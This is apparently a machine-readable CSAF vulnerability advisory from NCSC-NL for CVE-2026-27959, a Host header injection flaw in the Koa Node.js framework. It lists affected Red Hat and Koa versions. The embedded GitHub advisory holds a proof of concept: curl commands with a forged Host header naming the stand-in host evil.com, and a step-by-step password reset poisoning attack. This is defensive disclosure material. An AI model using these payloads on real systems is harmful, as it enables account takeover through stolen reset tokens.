{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-27959", "tracking": { "current_release_date": "2026-03-23T10:29:52.228714Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-27959", "initial_release_date": "2026-02-26T02:25:19.858966Z", "revision_history": [ { "date": "2026-02-26T02:25:19.858966Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-02-26T02:25:24.737945Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-02-26T02:39:01.966887Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (3).| CWES updated (1)." }, { "date": "2026-02-26T02:39:04.766887Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-02-26T07:34:58.573466Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-02-26T14:13:20.740916Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-02-26T14:13:23.012737Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-02-26T21:01:44.928057Z", "number": "8", "summary": "Unknown change." }, { "date": "2026-02-26T23:39:50.375125Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)." }, { "date": "2026-02-26T23:39:53.374811Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-02-27T00:20:49.465504Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| Products created (1).| References created (4).| CWES updated (1)." }, { "date": "2026-02-28T00:27:33.384833Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (12).| Product Identifiers created (5).| Product Remediations created (12).| References created (5).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-02-28T01:25:55.676373Z", "number": "13", "summary": "Products created (1).| Product Identifiers created (2).| Products connected (1).| Exploits created (1)." }, { "date": "2026-02-28T01:25:58.755283Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-02-28T08:19:56.809938Z", "number": "15", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (88).| Products created (5).| References created (5).| CWES updated (1)." }, { "date": "2026-02-28T08:20:06.502422Z", "number": "16", "summary": "NCSC Score updated." }, { "date": "2026-03-02T17:01:34.594313Z", "number": "17", "summary": "Products removed (87)." }, { "date": "2026-03-02T17:01:40.175823Z", "number": "18", "summary": "NCSC Score updated." }, { "date": "2026-03-03T14:51:07.815040Z", "number": "19", "summary": "Products connected (87)." }, { "date": "2026-03-03T14:51:15.360773Z", "number": "20", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:39:19.101870Z", "number": "21", "summary": "Source connected.| CVE status created. (valid)| EPSS created." } ], "status": "interim", "version": "21" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/1", "product": { "name": "vers:rpm/1", "product_id": "CSAFPID-1508265", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhdh:1" } } } ], "category": "product_name", "name": "Red Hat Developer Hub" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1439279", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_ai" } } } ], "category": "product_name", "name": "Red Hat OpenShift AI (RHOAI)" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/4", "product": { "name": "vers:rpm/4", "product_id": "CSAFPID-1439328", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:4" } } } ], "category": "product_name", "name": "Red Hat OpenShift Container Platform 4" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3", "product": { "name": "vers:rpm/3", "product_id": "CSAFPID-1441150", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_devspaces:3" } } } ], "category": "product_name", "name": "Red Hat OpenShift Dev Spaces" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-5486263", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_portal:2" } } } ], "category": "product_name", "name": "Self-service automation portal 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5486265" } } ], "category": "product_name", "name": "automation-portal" } ], "category": "product_family", "name": "Self-service automation portal 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467450" } } ], "category": "product_name", "name": "code-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift Dev Spaces" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2933419" } } ], "category": "product_name", "name": "odh-dashboard-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222758" } } ], "category": "product_name", "name": "odh-mod-arch-gen-ai-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5157328" } } ], "category": "product_name", "name": "odh-mod-arch-model-registry-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift AI (RHOAI)" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2159493" } } ], "category": "product_name", "name": "ose-monitoring-plugin-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift Container Platform 4" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1508266" } } ], "category": "product_name", "name": "rhdh-hub-rhel9" } ], "category": "product_family", "name": "Red Hat Developer Hub" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/0.0.2", "product": { "name": "vers:unknown/0.0.2", "product_id": "CSAFPID-3780409" } }, { "category": "product_version_range", "name": "vers:unknown/0.1.0", "product": { "name": "vers:unknown/0.1.0", "product_id": "CSAFPID-3780410" } }, { "category": "product_version_range", "name": "vers:unknown/0.1.1", "product": { "name": "vers:unknown/0.1.1", "product_id": "CSAFPID-3780411" } }, { "category": "product_version_range", "name": "vers:unknown/0.1.2", "product": { "name": "vers:unknown/0.1.2", "product_id": "CSAFPID-3780412" } }, { "category": "product_version_range", "name": "vers:unknown/0.10.0", "product": { "name": "vers:unknown/0.10.0", "product_id": "CSAFPID-3780413" } }, { "category": "product_version_range", "name": "vers:unknown/0.11.0", "product": { "name": "vers:unknown/0.11.0", "product_id": "CSAFPID-3780414" } }, { "category": "product_version_range", "name": "vers:unknown/0.12.0", "product": { "name": "vers:unknown/0.12.0", "product_id": "CSAFPID-3780415" } }, { "category": "product_version_range", "name": "vers:unknown/0.12.1", "product": { "name": "vers:unknown/0.12.1", "product_id": "CSAFPID-3780416" } }, { "category": "product_version_range", "name": "vers:unknown/0.12.2", "product": { "name": "vers:unknown/0.12.2", "product_id": "CSAFPID-3780417" } }, { "category": "product_version_range", "name": "vers:unknown/0.13.0", "product": { "name": "vers:unknown/0.13.0", "product_id": "CSAFPID-3780418" } }, { "category": "product_version_range", "name": "vers:unknown/0.14.0", "product": { "name": "vers:unknown/0.14.0", "product_id": "CSAFPID-3780419" } }, { "category": "product_version_range", "name": "vers:unknown/0.15.0", "product": { "name": "vers:unknown/0.15.0", "product_id": "CSAFPID-3780420" } }, { "category": "product_version_range", "name": "vers:unknown/0.16.0", "product": { "name": "vers:unknown/0.16.0", "product_id": "CSAFPID-3780421" } }, { "category": "product_version_range", "name": "vers:unknown/0.17.0", "product": { "name": "vers:unknown/0.17.0", "product_id": "CSAFPID-3780422" } }, { "category": "product_version_range", "name": "vers:unknown/0.18.0", "product": { "name": "vers:unknown/0.18.0", "product_id": "CSAFPID-3780423" } }, { "category": "product_version_range", "name": "vers:unknown/0.18.1", "product": { "name": "vers:unknown/0.18.1", "product_id": "CSAFPID-3780424" } }, { "category": "product_version_range", "name": "vers:unknown/0.19.0", "product": { "name": "vers:unknown/0.19.0", "product_id": "CSAFPID-3780425" } }, { "category": "product_version_range", "name": "vers:unknown/0.19.1", "product": { "name": "vers:unknown/0.19.1", "product_id": "CSAFPID-3780426" } }, { "category": "product_version_range", "name": "vers:unknown/0.2.0", "product": { "name": "vers:unknown/0.2.0", "product_id": "CSAFPID-3780427" } }, { "category": "product_version_range", "name": "vers:unknown/0.2.1", "product": { "name": "vers:unknown/0.2.1", "product_id": "CSAFPID-3780428" } }, { "category": "product_version_range", "name": "vers:unknown/0.20.0", "product": { "name": "vers:unknown/0.20.0", "product_id": "CSAFPID-3780429" } }, { "category": "product_version_range", "name": "vers:unknown/0.21.0", "product": { "name": "vers:unknown/0.21.0", "product_id": "CSAFPID-2205447" } }, { "category": "product_version_range", "name": "vers:unknown/0.3.0", "product": { "name": "vers:unknown/0.3.0", "product_id": "CSAFPID-3780430" } }, { "category": "product_version_range", "name": "vers:unknown/0.4.0", "product": { "name": "vers:unknown/0.4.0", "product_id": "CSAFPID-3780431" } }, { "category": "product_version_range", "name": "vers:unknown/0.5.0", "product": { "name": "vers:unknown/0.5.0", "product_id": "CSAFPID-3780432" } }, { "category": "product_version_range", "name": "vers:unknown/0.5.1", "product": { "name": "vers:unknown/0.5.1", "product_id": "CSAFPID-3780433" } }, { "category": "product_version_range", "name": "vers:unknown/0.5.2", "product": { "name": "vers:unknown/0.5.2", "product_id": "CSAFPID-3780434" } }, { "category": "product_version_range", "name": "vers:unknown/0.5.3", "product": { "name": "vers:unknown/0.5.3", "product_id": "CSAFPID-3780435" } }, { "category": "product_version_range", "name": "vers:unknown/0.5.4", "product": { "name": "vers:unknown/0.5.4", "product_id": "CSAFPID-3780436" } }, { "category": "product_version_range", "name": "vers:unknown/0.5.5", "product": { "name": "vers:unknown/0.5.5", "product_id": "CSAFPID-3780437" } }, { "category": "product_version_range", "name": "vers:unknown/0.6.0", "product": { "name": "vers:unknown/0.6.0", "product_id": "CSAFPID-3780438" } }, { "category": "product_version_range", "name": "vers:unknown/0.6.1", "product": { "name": "vers:unknown/0.6.1", "product_id": "CSAFPID-3780439" } }, { "category": "product_version_range", "name": "vers:unknown/0.6.2", "product": { "name": "vers:unknown/0.6.2", "product_id": "CSAFPID-3780440" } }, { "category": "product_version_range", "name": "vers:unknown/0.6.3", "product": { "name": "vers:unknown/0.6.3", "product_id": "CSAFPID-3780441" } }, { "category": "product_version_range", "name": "vers:unknown/0.7.0", "product": { "name": "vers:unknown/0.7.0", "product_id": "CSAFPID-3780442" } }, { "category": "product_version_range", "name": "vers:unknown/0.8.0", "product": { "name": "vers:unknown/0.8.0", "product_id": "CSAFPID-3780443" } }, { "category": "product_version_range", "name": "vers:unknown/0.8.1", "product": { "name": "vers:unknown/0.8.1", "product_id": "CSAFPID-3780444" } }, { "category": "product_version_range", "name": "vers:unknown/0.8.2", "product": { "name": "vers:unknown/0.8.2", "product_id": "CSAFPID-3780445" } }, { "category": "product_version_range", "name": "vers:unknown/0.9.0", "product": { "name": "vers:unknown/0.9.0", "product_id": "CSAFPID-3780446" } }, { "category": "product_version_range", "name": "vers:unknown/1.0.0", "product": { "name": "vers:unknown/1.0.0", "product_id": "CSAFPID-3780447" } }, { "category": "product_version_range", "name": "vers:unknown/1.1.0", "product": { "name": "vers:unknown/1.1.0", "product_id": "CSAFPID-3780448" } }, { "category": "product_version_range", "name": "vers:unknown/2.0.0-alpha.1", "product": { "name": "vers:unknown/2.0.0-alpha.1", "product_id": "CSAFPID-3780449" } }, { "category": "product_version_range", "name": "vers:unknown/2.0.0-alpha.2", "product": { "name": "vers:unknown/2.0.0-alpha.2", "product_id": "CSAFPID-3780450" } }, { "category": "product_version_range", "name": "vers:unknown/2.0.0-alpha.3", "product": { "name": "vers:unknown/2.0.0-alpha.3", "product_id": "CSAFPID-3780451" } }, { "category": "product_version_range", "name": "vers:unknown/2.0.0-alpha.4", "product": { "name": "vers:unknown/2.0.0-alpha.4", "product_id": "CSAFPID-3780452" } }, { "category": "product_version_range", "name": "vers:unknown/2.0.0-alpha.5", "product": { "name": "vers:unknown/2.0.0-alpha.5", "product_id": "CSAFPID-3780453" } }, { "category": "product_version_range", "name": "vers:unknown/2.0.0-alpha.6", "product": { "name": "vers:unknown/2.0.0-alpha.6", "product_id": "CSAFPID-3780454" } }, { "category": "product_version_range", "name": "vers:unknown/2.0.0-alpha.7", "product": { "name": "vers:unknown/2.0.0-alpha.7", "product_id": "CSAFPID-3780455" } }, { "category": "product_version_range", "name": "vers:unknown/2.0.0-alpha.8", "product": { "name": "vers:unknown/2.0.0-alpha.8", "product_id": "CSAFPID-3780456" } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1", "product": { "name": "vers:unknown/2.0.1", "product_id": "CSAFPID-3780457" } }, { "category": "product_version_range", "name": "vers:unknown/2.1.0", "product": { "name": "vers:unknown/2.1.0", "product_id": "CSAFPID-3780458" } }, { "category": "product_version_range", "name": "vers:unknown/2.10.0", "product": { "name": "vers:unknown/2.10.0", "product_id": "CSAFPID-3780459" } }, { "category": "product_version_range", "name": "vers:unknown/2.11.0", "product": { "name": "vers:unknown/2.11.0", "product_id": "CSAFPID-3780460" } }, { "category": "product_version_range", "name": "vers:unknown/2.12.0", "product": { "name": "vers:unknown/2.12.0", "product_id": "CSAFPID-3780461" } }, { "category": "product_version_range", "name": "vers:unknown/2.12.1", "product": { "name": "vers:unknown/2.12.1", "product_id": "CSAFPID-3780462" } }, { "category": "product_version_range", "name": "vers:unknown/2.13.0", "product": { "name": "vers:unknown/2.13.0", "product_id": "CSAFPID-3780463" } }, { "category": "product_version_range", "name": "vers:unknown/2.13.1", "product": { "name": "vers:unknown/2.13.1", "product_id": "CSAFPID-3780464" } }, { "category": "product_version_range", "name": "vers:unknown/2.13.2", "product": { "name": "vers:unknown/2.13.2", "product_id": "CSAFPID-3797112" } }, { "category": "product_version_range", "name": "vers:unknown/2.13.3", "product": { "name": "vers:unknown/2.13.3", "product_id": "CSAFPID-3797113" } }, { "category": "product_version_range", "name": "vers:unknown/2.13.4", "product": { "name": "vers:unknown/2.13.4", "product_id": "CSAFPID-3797114" } }, { "category": "product_version_range", "name": "vers:unknown/2.14.0", "product": { "name": "vers:unknown/2.14.0", "product_id": "CSAFPID-3797115" } }, { "category": "product_version_range", "name": "vers:unknown/2.14.1", "product": { "name": "vers:unknown/2.14.1", "product_id": "CSAFPID-3797116" } }, { "category": "product_version_range", "name": "vers:unknown/2.14.2", "product": { "name": "vers:unknown/2.14.2", "product_id": "CSAFPID-3797117" } }, { "category": "product_version_range", "name": "vers:unknown/2.15.0", "product": { "name": "vers:unknown/2.15.0", "product_id": "CSAFPID-2205448" } }, { "category": "product_version_range", "name": "vers:unknown/2.15.1", "product": { "name": "vers:unknown/2.15.1", "product_id": "CSAFPID-2205443" } }, { "category": "product_version_range", "name": "vers:unknown/2.15.2", "product": { "name": "vers:unknown/2.15.2", "product_id": "CSAFPID-2205442" } }, { "category": "product_version_range", "name": "vers:unknown/2.15.3", "product": { "name": "vers:unknown/2.15.3", "product_id": "CSAFPID-2205440" } }, { "category": "product_version_range", "name": "vers:unknown/2.15.4", "product": { "name": "vers:unknown/2.15.4", "product_id": "CSAFPID-5140726" } }, { "category": "product_version_range", "name": "vers:unknown/2.3.0", "product": { "name": "vers:unknown/2.3.0", "product_id": "CSAFPID-3780466" } }, { "category": "product_version_range", "name": "vers:unknown/2.4.0", "product": { "name": "vers:unknown/2.4.0", "product_id": "CSAFPID-3780467" } }, { "category": "product_version_range", "name": "vers:unknown/2.4.1", "product": { "name": "vers:unknown/2.4.1", "product_id": "CSAFPID-3780468" } }, { "category": "product_version_range", "name": "vers:unknown/2.5.0", "product": { "name": "vers:unknown/2.5.0", "product_id": "CSAFPID-3780469" } }, { "category": "product_version_range", "name": "vers:unknown/2.5.1", "product": { "name": "vers:unknown/2.5.1", "product_id": "CSAFPID-3780470" } }, { "category": "product_version_range", "name": "vers:unknown/2.5.2", "product": { "name": "vers:unknown/2.5.2", "product_id": "CSAFPID-3780471" } }, { "category": "product_version_range", "name": "vers:unknown/2.5.3", "product": { "name": "vers:unknown/2.5.3", "product_id": "CSAFPID-3780472" } }, { "category": "product_version_range", "name": "vers:unknown/2.6.0", "product": { "name": "vers:unknown/2.6.0", "product_id": "CSAFPID-3780473" } }, { "category": "product_version_range", "name": "vers:unknown/2.6.1", "product": { "name": "vers:unknown/2.6.1", "product_id": "CSAFPID-3780474" } }, { "category": "product_version_range", "name": "vers:unknown/2.6.2", "product": { "name": "vers:unknown/2.6.2", "product_id": "CSAFPID-3780475" } }, { "category": "product_version_range", "name": "vers:unknown/2.7.0", "product": { "name": "vers:unknown/2.7.0", "product_id": "CSAFPID-3780476" } }, { "category": "product_version_range", "name": "vers:unknown/2.8.0", "product": { "name": "vers:unknown/2.8.0", "product_id": "CSAFPID-3780477" } }, { "category": "product_version_range", "name": "vers:unknown/2.8.1", "product": { "name": "vers:unknown/2.8.1", "product_id": "CSAFPID-3780478" } }, { "category": "product_version_range", "name": "vers:unknown/2.8.2", "product": { "name": "vers:unknown/2.8.2", "product_id": "CSAFPID-3780479" } }, { "category": "product_version_range", "name": "vers:unknown/2.9.0", "product": { "name": "vers:unknown/2.9.0", "product_id": "CSAFPID-3780480" } }, { "category": "product_version_range", "name": "vers:unknown/<2.16.14", "product": { "name": "vers:unknown/<2.16.14", "product_id": "CSAFPID-5736894", "product_identification_helper": { "cpe": "cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/<2.16.4", "product": { "name": "vers:unknown/<2.16.4", "product_id": "CSAFPID-5723467" } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<2.16.4", "product": { "name": "vers:unknown/>=0|<2.16.4", "product_id": "CSAFPID-5733339" } }, { "category": "product_version_range", "name": "vers:unknown/>=3.0.0|<3.1.2", "product": { "name": "vers:unknown/>=3.0.0|<3.1.2", "product_id": "CSAFPID-5723466", "product_identification_helper": { "cpe": "cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/v2.16.0", "product": { "name": "vers:unknown/v2.16.0", "product_id": "CSAFPID-5140727" } }, { "category": "product_version_range", "name": "vers:unknown/v2.16.1", "product": { "name": "vers:unknown/v2.16.1", "product_id": "CSAFPID-5748305" } }, { "category": "product_version_range", "name": "vers:unknown/v2.16.2", "product": { "name": "vers:unknown/v2.16.2", "product_id": "CSAFPID-5129396" } }, { "category": "product_version_range", "name": "vers:unknown/v2.16.3", "product": { "name": "vers:unknown/v2.16.3", "product_id": "CSAFPID-5748306" } }, { "category": "product_version_range", "name": "vers:unknown/v3.0.0", "product": { "name": "vers:unknown/v3.0.0", "product_id": "CSAFPID-5138906" } }, { "category": "product_version_range", "name": "vers:unknown/v3.0.1", "product": { "name": "vers:unknown/v3.0.1", "product_id": "CSAFPID-5129397" } }, { "category": "product_version_range", "name": "vers:unknown/v3.0.2", "product": { "name": "vers:unknown/v3.0.2", "product_id": "CSAFPID-5129398" } }, { "category": "product_version_range", "name": "vers:unknown/v3.0.3", "product": { "name": "vers:unknown/v3.0.3", "product_id": "CSAFPID-5748307" } }, { "category": "product_version_range", "name": "vers:unknown/v3.1.0", "product": { "name": "vers:unknown/v3.1.0", "product_id": "CSAFPID-5748308" } }, { "category": "product_version_range", "name": "vers:unknown/v3.1.1", "product": { "name": "vers:unknown/v3.1.1", "product_id": "CSAFPID-5748309" } } ], "category": "product_name", "name": "koa" } ], "category": "vendor", "name": "koajs" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-27959", "notes": [ { "category": "description", "text": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27959" }, { "category": "description", "text": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27959" }, { "category": "description", "text": "## Summary\n\nKoa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol (e.g., `evil.com:fake@legitimate.com`) is received, `ctx.hostname` returns `evil.com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks.\n\n## Details\n\nThe vulnerability exists in Koa's hostname getter in `lib/request.js`:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget hostname() {\n const host = this.host;\n if (!host) return '';\n if ('[' === host[0]) return this.URL.hostname || ''; // IPv6 literal\n return host.split(':', 1)[0];\n}\n```\n\nThe `host` getter retrieves the raw header value with HTTP/2 and proxy support:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget host() {\n const proxy = this.app.proxy;\n let host = proxy && this.get('X-Forwarded-Host');\n if (!host) {\n if (this.req.httpVersionMajor >= 2) host = this.get(':authority');\n if (!host) host = this.get('Host');\n }\n if (!host) return '';\n return host.split(',')[0].trim();\n}\n```\n\n### The Problem\n\nThe parsing logic simply splits on the first `:` and returns the first segment. There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2.\n\n**RFC 3986 Section 3.2.2** defines the host component as:\n\n```\nhost = IP-literal / IPv4address / reg-name\nreg-name = *( unreserved / pct-encoded / sub-delims )\nunreserved = ALPHA / DIGIT / \"-\" / \".\" / \"_\" / \"~\"\nsub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\"\n```\n\nThe `@` character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component.\n\n### Attack Vector\n\nWhen an attacker sends:\n\n```\nHost: evil.com:fake@legitimate.com:3000\n```\n\nKoa parses this as:\n\n| API | Returns | Notes |\n|-----|---------|-------|\n| `ctx.get('Host')` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header |\n| `ctx.hostname` | `\"evil.com\"` | **Attacker-controlled** |\n| `ctx.host` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header value |\n| `ctx.origin` | `\"http://evil.com:fake@legitimate.com:3000\"` | Protocol + malformed host |\n\nThe `ctx.hostname` API returns `evil.com` because the parser splits on the first `:` without understanding that `evil.com:fake@legitimate.com` is a malformed authority component where `evil.com:fake` would be interpreted as userinfo by a proper URI parser.\n\n### Additional Concern: `ctx.origin`\n\nKoa's `ctx.origin` property concatenates protocol and host without validation:\n\n```javascript\n// lib/request.js\nget origin() {\n return `${this.protocol}://${this.host}`;\n}\n```\n\nApplications using `ctx.origin` for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo.\n\n### HTTP/2 Consideration\n\nKoa explicitly checks `httpVersionMajor >= 2` to read the `:authority` pseudo-header:\n\n```javascript\nif (this.req.httpVersionMajor >= 2) host = this.get(':authority');\n```\n\nThe same vulnerability applies - malformed `:authority` values containing userinfo would be accepted and parsed identically.\n\n## PoC\n\n### Setup\n\n```javascript\n// server.js\nconst Koa = require('koa'); \nconst app = new Koa();\n\n// Simulates password reset URL generation (common vulnerable pattern)\napp.use(async ctx => {\n if (ctx.path === '/forgot-password') {\n const resetToken = 'abc123securtoken';\n const resetUrl = `${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken}`;\n \n ctx.body = {\n message: 'Password reset link generated',\n resetUrl: resetUrl,\n debug: {\n rawHost: ctx.get('Host'),\n parsedHostname: ctx.hostname,\n origin: ctx.origin,\n protocol: ctx.protocol\n }\n };\n }\n});\n\napp.listen(3000, () => console.log('Server on http://localhost:3000'));\n```\n\n### Exploit\n\n```bash\ncurl -H \"Host: evil.com:fake@localhost:3000\" http://localhost:3000/forgot-password\n```\n\n### Result\n\n```json\n{\n \"message\": \"Password reset link generated\",\n \"resetUrl\": \"http://evil.com/reset?token=abc123securtoken\",\n \"debug\": {\n \"rawHost\": \"evil.com:fake@localhost:3000\",\n \"parsedHostname\": \"evil.com\",\n \"origin\": \"http://evil.com:fake@localhost:3000\",\n \"protocol\": \"http\"\n }\n}\n```\n\nThe password reset URL points to `evil.com` instead of the legitimate server. In a real attack:\n\n1. Attacker requests password reset for victim's email with malicious Host header\n2. Server generates reset link using `ctx.hostname` → `https://evil.com/reset?token=SECRET`\n3. Victim receives email with poisoned link\n4. Victim clicks link, token is sent to attacker's server\n5. Attacker uses token to reset victim's password\n\n### Additional Test Cases\n\n```bash\n# Basic injection\ncurl -H \"Host: evil.com:x@legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n\n# With port preservation attempt\ncurl -H \"Host: evil.com:443@legitimate.com:3000\" http://localhost:3000/forgot-password \n# Result: hostname = \"evil.com\"\n\n# Unicode/encoded variations\ncurl -H \"Host: evil.com:x%40legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n```\n\n### Deployment Consideration\n\nFor this attack to succeed in production, the malicious Host header must reach the Koa application. This occurs when:\n\n1. **No reverse proxy** - Application directly exposed to internet\n2. **Misconfigured proxy** - Proxy doesn't override/validate Host header\n3. **Proxy trust enabled** (`app.proxy = true`) - `X-Forwarded-Host` can be injected\n4. **Default virtual host** - Server is the catch-all for unrecognized Host headers\n\n## Impact\n\n### Vulnerability Type\n\n- CWE-20: Improper Input Validation\n- CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax\n\n### Attack Scenarios\n\n**1. Password Reset Poisoning (High Severity)**\n- Attacker hijacks password reset tokens by poisoning reset URLs\n- Requires victim to click link in email\n- Results in account takeover\n\n**2. Email Verification Bypass**\n- Attacker poisons email verification links\n- Can verify attacker-controlled email on victim accounts\n\n**3. OAuth/SSO Callback Manipulation**\n- Applications using `ctx.hostname` for OAuth redirect URIs\n- Attacker redirects OAuth callbacks to malicious server\n- Results in token theft\n\n**4. Web Cache Poisoning**\n- If responses are cached without Host in cache key\n- Poisoned URLs served to all users\n- Persistent XSS/phishing via cached responses\n\n**5. Server-Side Request Forgery (SSRF)**\n- Internal routing decisions based on `ctx.hostname`\n- Attacker manipulates which backend receives requests\n\n### Who Is Impacted\n\n- **Direct impact**: Any Koa application using `ctx.hostname` or `ctx.origin` for URL generation without additional validation\n- **Common patterns**: Password reset, email verification, webhook URL generation, multi-tenant routing, OAuth implementations", "title": "github - https://github.com/advisories/GHSA-7gcc-r8m5-44qm" }, { "category": "description", "text": "## Summary\n\nKoa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol (e.g., `evil.com:fake@legitimate.com`) is received, `ctx.hostname` returns `evil.com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks.\n\n## Details\n\nThe vulnerability exists in Koa's hostname getter in `lib/request.js`:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget hostname() {\n const host = this.host;\n if (!host) return '';\n if ('[' === host[0]) return this.URL.hostname || ''; // IPv6 literal\n return host.split(':', 1)[0];\n}\n```\n\nThe `host` getter retrieves the raw header value with HTTP/2 and proxy 